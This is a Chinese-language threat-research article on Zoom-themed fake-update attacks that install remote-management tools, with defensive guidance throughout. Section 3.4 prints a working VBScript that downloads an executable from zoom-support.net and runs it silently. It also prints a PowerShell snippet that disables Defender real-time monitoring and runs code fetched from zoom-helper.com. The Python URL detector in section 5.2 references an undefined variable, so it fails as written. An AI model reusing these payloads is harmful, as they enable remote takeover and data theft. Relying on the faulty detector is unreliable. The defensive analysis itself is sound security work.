摘要
远程办公普及使 Zoom 成为企业协同核心基础设施,攻击者依托高仿真会议诱饵、伪装安装包与合法远程工具滥用,形成点击 — 下载 — 执行 — 被控的新型 Click‑Install 攻击链。此类攻击以伪造 Zoom 会议邀请为入口,诱导用户下载伪装为客户端或更新包的恶意程序,通过 VBS 脚本、无文件 PowerShell 等方式部署 ScreenConnect 等 RMM 工具,实现持久化远程控制、数据窃取与勒索软件投放,传统邮件网关、终端防护与 MFA 均存在显著检测盲区。反网络钓鱼技术专家芦笛指出,Zoom 主题 Click‑Install 攻击已从凭证窃取转向载荷投递与远程控制,依托场景信任与合法工具滥用实现高隐蔽性渗透,成为企业终端与身份安全的主流威胁。本文以 Soc Prime 披露的活跃威胁为核心样本,结合 BlueNoroff、Lazarus 等组织实战案例,系统拆解攻击全流程、技术实现与社工诱导逻辑,给出 URL 检测、脚本行为拦截、终端管控与威胁狩猎的代码级实现,构建覆盖治理、检测、响应、溯源的闭环防御体系,为企业抵御此类攻击提供可落地的技术方案。
1 引言
远程协同场景常态化使 Zoom 日均会议请求量持续攀升,攻击者针对高频使用习惯与场景信任度,将传统钓鱼从 ** credential harvesting升级为click‑install compromise**,即通过伪造会议异常、版本过期、组件缺失等理由,强制诱导用户点击下载并安装伪装程序,直接获取系统控制权。与窃取账号密码的钓鱼不同,该模式一步到位实现终端沦陷,可横向移动、数据外泄、部署勒索软件,攻击成功率与危害等级显著提升。
Soc Prime 在 2026 年 5 月威胁情报中标记此类攻击为活跃高风险,攻击组织借助 typo‑squat 域名、高仿真页面、语音提示与紧急话术,降低用户警惕性;载荷以合法 RMM 工具为远程控制载体,配合脚本启动、无文件执行规避检测;攻击目标覆盖金融、科技、加密货币等机构,呈现高度定向化特征。现有防御体系多聚焦邮件内容与恶意域名,对合法工具滥用、用户主动执行、场景化社工三大核心环节存在防护缺口。
本文围绕 Zoom 主题 Click‑Install 攻击展开全维度研究,界定攻击范式、拆解链路、剖析技术细节、评估风险危害,提供可直接部署的检测代码与防御策略,形成理论严谨、技术可行、闭环完整的研究成果,为企业安全运营与威胁狩猎提供支撑。
2 Zoom 主题 Click‑Install 攻击的核心范式与场景特征
2.1 概念界定与攻击定位
Zoom 主题 Click‑Install 攻击是指攻击者伪造 Zoom 会议邀请、异常提示、更新通知等场景,诱导用户点击恶意链接并主动下载、安装、执行伪装程序,从而在终端建立持久化远程控制,实现数据窃取、横向渗透与勒索部署的定向攻击。
反网络钓鱼技术专家芦笛强调,该攻击的本质是场景化社工 + 合法工具滥用 + 用户主动执行的复合攻击,传统基于特征码、邮件关键字、恶意 IP 的防护规则失效,检测与防御难度呈指数级上升。
2.2 场景化诱导的典型形态
会议异常类:提示连接中断、音视频故障、需要修复组件才能入会;
版本过期类:提示客户端版本过低,必须更新才能加入会议;
组件缺失类:提示缺少语音 / 视频插件、浏览器扩展、SDK 支持包;
紧急会议类:以高管会议、应急沟通、客户质询制造紧迫感,催促快速操作。
2.3 攻击链路的标准化流程
诱饵投放:通过邮件、即时通讯、社交平台发送伪造 Zoom 邀请,包含紧急会议、未接来电、版本更新等主题;
页面信任构建:跳转高仿真 Zoom 页面,显示会议号、参会人、加载动画、语音提示,模拟官方体验;
诱导点击安装:弹窗提示异常,引导下载 “修复工具”“更新包”“客户端组件”;
载荷启动:用户执行文件,启动 VBS/JS/PowerShell 脚本,释放或拉取远程控制工具;
持久化控制:连接 C2 服务器,获取完整控制权限,执行文件遍历、凭据窃取、横向移动、勒索加密等操作。
2.4 与传统钓鱼的关键差异
表格
维度 传统凭证钓鱼 Zoom 主题 Click‑Install 攻击
核心目标 窃取账号密码 获取终端完整控制权
用户行为 输入账号密码 主动下载并执行程序
载荷性质 网页表单 可执行文件、脚本、安装包
检测难度 低,页面仿冒可识别 高,合法工具 + 无文件执行
危害范围 账号泄露 终端被控、内网渗透、数据泄露
MFA 有效性 有效 无效,已绕过认证环节
3 攻击全流程技术拆解与载荷实现
3.1 社会工程学诱导机制
权威与紧急性叠加:使用 “紧急会议”“高管召集”“客户等待” 等话术,压制理性判断;
场景高度还原:页面布局、图标、文案、语音与官方一致,用户产生熟悉感;
故障合理化:将攻击行为包装为 “修复故障”“更新组件”,降低防御心理;
操作极简:一键下载、一键运行,减少用户思考与验证环节。
反网络钓鱼技术专家芦笛指出,此类攻击成功的核心不是技术复杂度,而是对协同场景与用户习惯的精准利用,安全意识薄弱的员工极易成为突破口。
3.2 伪装页面与诱饵链接技术
Typo‑squat 域名:zoom‑us.app、zoom‑support.net、us4zoom.us 等混淆域名;
页面克隆:完整复刻 Zoom 会议加载、入会、异常提示界面;
动态欺骗:模拟浏览器检测、进度条、倒计时、语音播报;
路径伪装:链接显示 zoom.us,实际指向恶意域名。
3.3 载荷投递与执行技术
伪装载体
安装包:ZoomSetup.exe、ZoomPatch.msi、ZoomSupport.dmg;
脚本:update.vbs、repair.js、zoom.ps1;
宏文档:会议信息.docm、参会名单.xlsm。
启动方式
脚本释放:VBS/JS 脚本解密并写入载荷;
无文件执行:PowerShell 直接内存加载,不落地文件;
合法工具劫持:调用系统程序执行代码,规避 EDR。
远程控制核心
攻击广泛滥用ConnectWise ScreenConnect、AnyDesk、TeamViewer等合法 RMM 工具,攻击者预制配置文件,安装后自动回连 C2,获得完整控制权限。此类工具具备合法签名、常规运维用途,终端极易放行。
3.4 典型攻击代码片段(还原攻击逻辑)
3.4.1 伪装 Zoom 更新的 VBS 启动脚本
vbscript
' 模拟Zoom更新修复脚本,实际释放并启动ScreenConnect
On Error Resume Next
Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
strTemp = objShell.ExpandEnvironmentStrings("%TEMP%")
strPayload = strTemp & "\ScreenConnectClient.exe"
' 从C2下载远程控制客户端
strURL = "https://zoom-support.net/payload/ScClient.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.Open "GET", strURL, False
objXMLHTTP.Send
If objXMLHTTP.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = 1
objStream.Write objXMLHTTP.ResponseBody
objStream.SaveToFile strPayload, 2
objStream.Close
End If
' 静默安装并启动
objShell.Run chr(34) & strPayload & chr(34) & " /silent", 0
Set objShell = Nothing
Set objFSO = Nothing
3.4.2 无文件 PowerShell 加载载荷
powershell
# 伪装Zoom音频修复,内存加载C2指令
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
$c2 = "https://zoom-helper.com/api/command"
$wc = New-Object System.Net.WebClient
$code = $wc.DownloadString($c2)
IEX $code
反网络钓鱼技术专家芦笛强调,上述代码具备无文件、驻留内存、合法工具滥用特征,传统 AV/EDR 基于文件特征的检测规则极易被绕过。
3.5 持久化与横向移动手段
注册表 Run 键、计划任务、服务自启动;
窃取 LSASS 凭据、浏览器密码、SSH 密钥;
利用 SMB/WinRM/WMI 对内网横向渗透,批量沦陷主机。
4 攻击危害、典型案例与防御盲区
4.1 多维度安全危害
终端控制权丧失:攻击者完全操控桌面、文件、摄像头、麦克风;
核心数据外泄:窃取文档、代码、客户信息、账号凭据;
内网横向渗透:以单点为跳板,攻陷整个办公网络;
勒索与业务中断:部署 BlackSuit 等勒索软件,加密数据索要赎金;
声誉与合规风险:数据泄露触发监管处罚与品牌损失。
4.2 典型实战案例
BlueNoroff 针对 Web3 机构攻击
伪装法务咨询会议,诱导下载 “Zoom 扩展”,执行 AppleScript 部署远控,窃取密钥与交易数据,单机构损失超百万美元。
ScreenConnect 滥用攻击浪潮
攻击者伪造 Zoom 更新,通过 VBS 部署 ScreenConnect,24 小时内控制上千台主机,投放勒索软件,波及制造业、医疗、教育等行业。
Lazarus 组织房地产行业诈骗
伪装买家会议,诱导安装恶意组件,窃取邮件后篡改电汇指令,实施交易欺诈。
反网络钓鱼技术专家芦笛指出,上述案例共同特征是以 Zoom 为信任入口、以合法远控工具为载体、以用户主动执行为关键,防御体系必须覆盖全链路。
4.3 现有防御体系的核心盲区
终端防护:放行合法 RMM 工具,无法区分运维与恶意使用;
邮件网关:页面仿冒度高、无恶意关键字,难以拦截;
身份认证:MFA 无效,攻击直接绕过登录环节;
安全意识:员工对 “会议故障→下载修复” 形成条件反射;
流量检测:C2 使用 HTTPS 加密,常规流量分析无法识别。
5 检测识别、威胁狩猎与代码实现
5.1 多维度检测指标
URL 与域名检测
包含 zoom、meeting、update、support 等关键词的混淆域名;
非官方域名但页面标题 / 内容高度模仿 Zoom;
短链接跳转至可疑 Zoom 相关页面。
文件与行为检测
文件名含 Zoom、Setup、Patch、Repair 的可执行文件 / 脚本;
脚本修改 Windows Defender、创建计划任务、写入注册表启动项;
常见 RMM 工具由非可信路径、非管理员进程启动。
网络行为检测
终端向未知境外 IP 发起长连接;
短时间内大量文件读取、凭据访问、内网端口扫描。
5.2 恶意 Zoom 链接检测代码
import re
import tldextract
from urllib.parse import urlparse
# 高风险关键词与官方白名单
RISK_KEYWORDS = ["zoom", "meeting", "update", "setup", "support", "patch", "repair"]
ALLOWED_DOMAINS = {"zoom.us", "zoom.com", "zmcdn.com"}
def detect_zoom_phishing_url(url: str) -> dict:
"""检测Zoom主题钓鱼URL"""
result = {"risk": False, "reason": [], "score": 0}
# 域名解析
parsed = urlparse(url)
domain_info = tldextract.extract(parsed.netloc)
full_domain = f"{domain_info.domain}.{domain_info.suffix}"
# 官方域名直接放行
if full_domain in ALLOWED_DOMAINS:
return result
# 混淆关键词检测
for kw in RISK_KEYWORINS:
if re.search(kw, full_domain, re.I):
result["reason"].append(f"域名包含高风险关键词: {kw}")
result["score"] += 30
# 异常子域名
if len(domain_info.subdomain.split(".")) > 2:
result["reason"].append("多级子域名,疑似钓鱼")
result["score"] += 20
# 非标准端口
if parsed.port and parsed.port not in (80, 443):
result["reason"].append(f"使用异常端口: {parsed.port}")
result["score"] += 20
# 风险判定
if result["score"] >= 40:
result["risk"] = True
return result
# 测试示例
if __name__ == "__main__":
test_url = "https://zoom-support123.net/update/ZoomSetup.exe"
print(detect_zoom_phishing_url(test_url))
5.3 终端恶意行为检测(脚本与远控工具)
import psutil
import re
# 恶意行为特征
MALICIOUS_SIGNS = {
"process_names": ["cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"],
"commands": [
r"Set-MpPreference", r"DisableRealtimeMonitoring",
r"ADODB\.Stream", r"MSXML2\.XMLHTTP",
r"ScreenConnect", r"AnyDesk", r"TeamViewer"
]
}
def scan_malicious_process() -> list:
"""扫描终端恶意进程与命令行"""
alerts = []
for proc in psutil.process_iter(["pid", "name", "cmdline"]):
try:
pname = proc.info["name"]
cmdline = " ".join(proc.info["cmdline"] or [])
if pname in MALICIOUS_SIGNS["process_names"]:
for pat in MALICIOUS_SIGNS["commands"]:
if re.search(pat, cmdline, re.I):
alerts.append({
"pid": proc.info["pid"],
"process": pname,
"cmdline": cmdline,
"threat": f"匹配恶意特征: {pat}"
})
except:
continue
return alerts
# 调用示例
if __name__ == "__main__":
threats = scan_malicious_process()
for t in threats:
print(f"告警:{t}")
5.4 威胁狩猎 IOC 库构建
重点采集以下 IOC 并纳入黑名单:
恶意域名、URL、IP、C2 地址;
伪装安装包哈希、脚本哈希;
远控工具异常配置信息、注册表路径;
攻击邮件主题、发件人模板、附件名称。
6 企业闭环防御体系构建
6.1 治理层:制度与权限管控
应用白名单:仅允许官方 Zoom 客户端自动更新,禁止未知来源安装包;
最小权限:普通用户无安装软件权限,必须通过 IT 审批;
RMM 工具管控:统一运维远控工具,禁止私自安装、运行未经审批的远程软件;
应急流程:明确 Click‑Install 攻击上报、隔离、查杀、溯源、恢复步骤。
反网络钓鱼技术专家芦笛强调,权限收敛与白名单是抵御用户主动执行类攻击的最有效手段。
6.2 技术层:全链路防御部署
邮件与网关防护
启用 SPF/DKIM/DMARC,校验邮件来源;
基于 NLP 与视觉识别检测仿冒页面;
拦截混淆域名、可疑下载链接。
终端安全增强
启用应用控制,阻止未知可执行文件与脚本;
监控 PowerShell/WMI/ 计划任务异常行为;
开启实时保护与内存入侵检测。
网络流量检测
对内网出站连接进行审计,拦截可疑 C2;
对远控工具流量进行白名单管控。
身份与访问控制
本地管理员权限限制,LSA 保护,凭据缓存禁用;
内网分段,限制横向移动路径。
6.3 运营层:监测响应与意识提升
持续监测:7×24 小时监控进程、日志、流量异常;
快速响应:发现攻击立即断网、查杀、撤销凭据、重置密码、排查横向;
渗透测试:定期模拟 Click‑Install 攻击,验证防御有效性;
安全意识:针对 Zoom 会议、更新、故障场景开展专项钓鱼演练。
6.4 平台级支撑方案
采用 SOAR 平台实现自动化响应:
识别恶意 URL→自动拉黑→邮件网关同步;
发现恶意进程→自动隔离主机→进程终结→文件删除;
提取 IOC→全网扫描→生成威胁报告→推送策略。
7 结论与展望
Zoom 主题 Click‑Install 攻击依托场景信任、社工诱导、合法工具滥用、用户主动执行,形成高隐蔽、高危害、高成功率的新型终端威胁,突破传统防御边界,对企业数据与业务安全构成严重威胁。攻击从凭证钓鱼转向载荷直接投递与远程控制,MFA、邮件网关、终端 AV 均存在防护短板,必须构建URL 检测 — 行为拦截 — 权限管控 — 自动化响应的闭环体系。
反网络钓鱼技术专家芦笛强调,防御此类攻击的核心是将场景化钓鱼纳入常态化防护,以技术手段阻断恶意链路,以权限管控限制执行空间,以意识培训降低人为风险,三者协同才能形成有效屏障。
未来,攻击将向 AI 深度伪造视频、多平台协同(Teams/Meet)、跨系统传播方向演进,防御需持续升级视觉识别、语义理解、行为基线、自动化响应能力,实现威胁早发现、早拦截、早处置。企业应将 Zoom 等高频协同工具的安全纳入整体防御框架,补齐场景化钓鱼短板,保障终端与身份安全底线。
编辑:芦笛(公共互联网反网络钓鱼工作组)
